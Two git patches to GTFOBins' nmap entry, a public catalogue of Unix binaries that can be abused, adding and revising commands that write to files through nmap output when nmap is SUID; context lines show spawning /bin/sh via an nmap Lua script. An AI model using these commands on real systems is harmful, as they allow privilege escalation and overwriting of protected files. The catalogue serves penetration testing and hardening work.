From edc8a2d03da03caf8e0b698938f6c0895a395964 Mon Sep 17 00:00:00 2001
From: Syed Umar Arfeen <18597330+Anon-Exploiter@users.noreply.github.com>
Date: Mon, 4 Jan 2021 12:16:29 +0500
Subject: [PATCH 1/2] Adding another usage of Nmap's SUID

I came along with this method on stackoverflow while trying to execute commands using a SUID nmap binary, though `--script` failed me but this works. Could be enough to demonstrate effect of using SUID on Nmap.

I've yet to come up with a way to over-write the contents of the system file according to what we want, with this we can only over-write files with nmap output.

```bash
sudo touch /etc/filecantbetouched
nmap 127.0.0.1 -oN=/etc/filecantbetouched
cat /etc/filecantbetouched
```
---
 _gtfobins/nmap.md | 5 +++++
 1 file changed, 5 insertions(+)

diff --git a/_gtfobins/nmap.md b/_gtfobins/nmap.md
index 7374564..0d4ccc6 100644
--- a/_gtfobins/nmap.md
+++ b/_gtfobins/nmap.md
@@ -108,4 +108,9 @@ functions:
         TF=$(mktemp)
         echo 'os.execute("/bin/sh")' > $TF
         ./nmap --script=$TF
+    - description: This will over-write files with nmap output, use with caution.
+      code: |
+        sudo touch /etc/filecantbetouched
+        nmap 127.0.0.1 -oN=/etc/filecantbetouched
+        cat /etc/filecantbetouched
 ---

From 5b2d89b99aafd4795851d159664311adc355a81f Mon Sep 17 00:00:00 2001
From: Andrea Cardaci <cyrus.and@gmail.com>
Date: Mon, 4 Jan 2021 08:58:56 +0100
Subject: [PATCH 2/2] Fix nmap SUID file-write

---
 _gtfobins/nmap.md | 12 ++++++++----
 1 file changed, 8 insertions(+), 4 deletions(-)

diff --git a/_gtfobins/nmap.md b/_gtfobins/nmap.md
index 0d4ccc6..ba93dde 100644
--- a/_gtfobins/nmap.md
+++ b/_gtfobins/nmap.md
@@ -87,6 +87,10 @@ functions:
         TF=$(mktemp)
         echo 'lua -e 'local f=io.open("file_to_write", "wb"); f:write("data"); io.close(f);' > $TF
         nmap --script=$TF
+    - description: The payload appears inside the regular nmap output.
+      code: |
+        LFILE=file_to_write
+        nmap -oG=$LFILE DATA
   file-read:
     - code: |
         TF=$(mktemp)
@@ -108,9 +112,9 @@ functions:
         TF=$(mktemp)
         echo 'os.execute("/bin/sh")' > $TF
         ./nmap --script=$TF
-    - description: This will over-write files with nmap output, use with caution.
+  suid:
+    - description: The payload appears inside the regular nmap output.
       code: |
-        sudo touch /etc/filecantbetouched
-        nmap 127.0.0.1 -oN=/etc/filecantbetouched
-        cat /etc/filecantbetouched
+        LFILE=file_to_write
+        ./nmap -oG=$LFILE DATA
 ---